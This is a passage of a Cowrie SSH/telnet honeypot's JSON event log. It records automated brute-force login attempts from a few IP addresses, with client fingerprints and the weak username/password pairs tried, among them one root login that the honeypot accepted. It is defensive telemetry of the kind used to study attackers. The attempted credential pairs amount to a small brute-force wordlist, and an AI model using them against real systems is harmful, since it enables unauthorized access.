084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T14:18:15.333952Z","src_ip":"212.227.235.229","session":"810e990a4bd9"}
{"eventid":"cowrie.login.success","username":"root","password":"opnsense","message":"login attempt [root/opnsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:18:15.632973Z","src_ip":"212.227.235.229","session":"810e990a4bd9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:18:15.782955Z","src_ip":"212.227.235.229","session":"810e990a4bd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54684,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c4aa5e3a910","protocol":"ssh","message":"New connection: 212.227.125.160:54684 (1.2.3.4:22) [session: 2c4aa5e3a910]","sensor":"my-vps","timestamp":"2025-08-28T14:18:23.932972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:18:23.933984Z","src_ip":"212.227.125.160","session":"2c4aa5e3a910"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:18:24.103750Z","src_ip":"212.227.125.160","session":"2c4aa5e3a910"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"12345678","message":"login attempt [redhat/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:18:24.820161Z","src_ip":"212.227.125.160","session":"2c4aa5e3a910"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:18:26.030864Z","src_ip":"212.227.125.160","session":"2c4aa5e3a910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35456,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9853688ac0a","protocol":"ssh","message":"New connection: 212.227.125.160:35456 (1.2.3.4:22) [session: e9853688ac0a]","sensor":"my-vps","timestamp":"2025-08-28T14:18:58.527072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:18:58.528035Z","src_ip":"212.227.125.160","session":"e9853688ac0a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:18:58.705058Z","src_ip":"212.227.125.160","session":"e9853688ac0a"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"qwerty","message":"login attempt [redhat/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:18:59.235354Z","src_ip":"212.227.125.160","session":"e9853688ac0a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:19:00.412896Z","src_ip":"212.227.125.160","session":"e9853688ac0a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56586,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8ee44ba2d80","protocol":"ssh","message":"New connection: 217.72.205.35:56586 (1.2.3.4:22) [session: b8ee44ba2d80]","sensor":"my-vps","timestamp":"2025-08-28T14:19:27.987501Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:19:27.988589Z","src_ip":"217.72.205.35","session":"b8ee44ba2d80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36390,"dst_ip":"1.2.3.4","dst_port":22,"session":"0305db8e716f","protocol":"ssh","message":"New connection: 212.227.125.160:36390 (1.2.3.4:22) [session: 0305db8e716f]","sensor":"my-vps","timestamp":"2025-08-28T14:19:32.505721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:19:32.610850Z","src_ip":"212.227.125.160","session":"0305db8e716f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:19:32.692834Z","src_ip":"212.227.125.160","session":"0305db8e716f"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"123123","message":"login attempt [redhat/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:19:33.347683Z","src_ip":"212.227.125.160","session":"0305db8e716f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:19:34.518945Z","src_ip":"212.227.125.160","session":"0305db8e716f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52254,"dst_ip":"1.2.3.4","dst_port":22,"session":"80c875f35f34","protocol":"ssh","message":"New connection: 212.227.125.160:52254 (1.2.3.4:22) [session: 80c875f35f34]","sensor":"my-vps","timestamp":"2025-08-28T14:19:41.725347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:19:41.726052Z","src_ip":"212.227.125.160","session":"80c875f35f34"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T14:19:41.785589Z","src_ip":"212.227.125.160","session":"80c875f35f34"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123sol","message":"login attempt [ubuntu/123sol] failed","sensor":"my-vps","timestamp":"2025-08-28T14:19:41.965624Z","src_ip":"212.227.125.160","session":"80c875f35f34"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:19:43.027354Z","src_ip":"212.227.125.160","session":"80c875f35f34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38474,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec5e768d2bda","protocol":"ssh","message":"New connection: 212.227.125.160:38474 (1.2.3.4:22) [session: ec5e768d2bda]","sensor":"my-vps","timestamp":"2025-08-28T14:20:07.281306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:20:07.282367Z","src_ip":"212.227.125.160","session":"ec5e768d2bda"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:20:07.444489Z","src_ip":"212.227.125.160","session":"ec5e768d2bda"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"111111","message":"login attempt [redhat/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:20:07.935016Z","src_ip":"212.227.125.160","session":"ec5e768d2bda"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:20:09.099247Z","src_ip":"212.227.125.160","session":"ec5e768d2bda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59074,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff891570cf5","protocol":"ssh","message":"New connection: 212.227.125.160:59074 (1.2.3.4:22) [session: aff891570cf5]","sensor":"my-vps","timestamp":"2025-08-28T14:20:44.506914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:20:44.509011Z","src_ip":"212.227.125.160","session":"aff891570cf5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:20:44.684533Z","src_ip":"212.227.125.160","session":"aff891570cf5"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"1234567","message":"login attempt [redhat/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:20:45.391890Z","src_ip":"212.227.125.160","session":"aff891570cf5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:20:46.575006Z","src_ip":"212.227.125.160","session":"aff891570cf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54230,"dst_ip":"1.2.3.4","dst_port":23,"session":"214ae7a5bc05","protocol":"telnet","message":"New connection: 212.227.235.229:54230 (1.2.3.4:23) [session: 214ae7a5bc05]","sensor":"my-vps","timestamp":"2025-08-28T14:20:47.893355Z"}
{"eventid":"cowrie.session.closed","duration":5.0001959800720215,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:20:52.893453Z","src_ip":"212.227.235.229","session":"214ae7a5bc05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44622,"dst_ip":"1.2.3.4","dst_port":22,"session":"78737e5c59cc","protocol":"ssh","message":"New connection: 212.227.125.160:44622 (1.2.3.4:22) [session: 78737e5c59cc]","sensor":"my-vps","timestamp":"2025-08-28T14:21:21.996052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:21:21.997101Z","src_ip":"212.227.125.160","session":"78737e5c59cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:21:22.161785Z","src_ip":"212.227.125.160","session":"78737e5c59cc"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"123456","message":"login attempt [admin1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:21:22.660390Z","src_ip":"212.227.125.160","session":"78737e5c59cc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:21:23.827755Z","src_ip":"212.227.125.160","session":"78737e5c59cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37084,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b2e5af0b1f7","protocol":"ssh","message":"New connection: 212.227.125.160:37084 (1.2.3.4:22) [session: 6b2e5af0b1f7]","sensor":"my-vps","timestamp":"2025-08-28T14:22:00.076241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:22:00.077402Z","src_ip":"212.227.125.160","session":"6b2e5af0b1f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:22:00.245250Z","src_ip":"212.227.125.160","session":"6b2e5af0b1f7"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"password","message":"login attempt [admin1/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:22:00.905408Z","src_ip":"212.227.125.160","session":"6b2e5af0b1f7"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:22:02.075739Z","src_ip":"212.227.125.160","session":"6b2e5af0b1f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45644,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a2f114669da","protocol":"ssh","message":"New connection: 212.227.125.160:45644 (1.2.3.4:22) [session: 8a2f114669da]","sensor":"my-vps","timestamp":"2025-08-28T14:22:09.813173Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:22:09.814276Z","src_ip":"212.227.125.160","session":"8a2f114669da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56938,"dst_ip":"1.2.3.4","dst_port":22,"session":"427e7bfab5da","protocol":"ssh","message":"New connection: 212.227.125.160:56938 (1.2.3.4:22) [session: 427e7bfab5da]","sensor":"my-vps","timestamp":"2025-08-28T14:22:37.931910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:22:37.932823Z","src_ip":"212.227.125.160","session":"427e7bfab5da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:22:38.102911Z","src_ip":"212.227.125.160","session":"427e7bfab5da"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"123456789","message":"login attempt [admin1/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:22:38.613046Z","src_ip":"212.227.125.160","session":"427e7bfab5da"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:22:39.785754Z","src_ip":"212.227.125.160","session":"427e7bfab5da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43102,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d235d511b54","protocol":"ssh","message":"New connection: 212.227.125.160:43102 (1.2.3.4:22) [session: 5d235d511b54]","sensor":"my-vps","timestamp":"2025-08-28T14:23:13.986109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:23:14.056513Z","src_ip":"212.227.125.160","session":"5d235d511b54"}
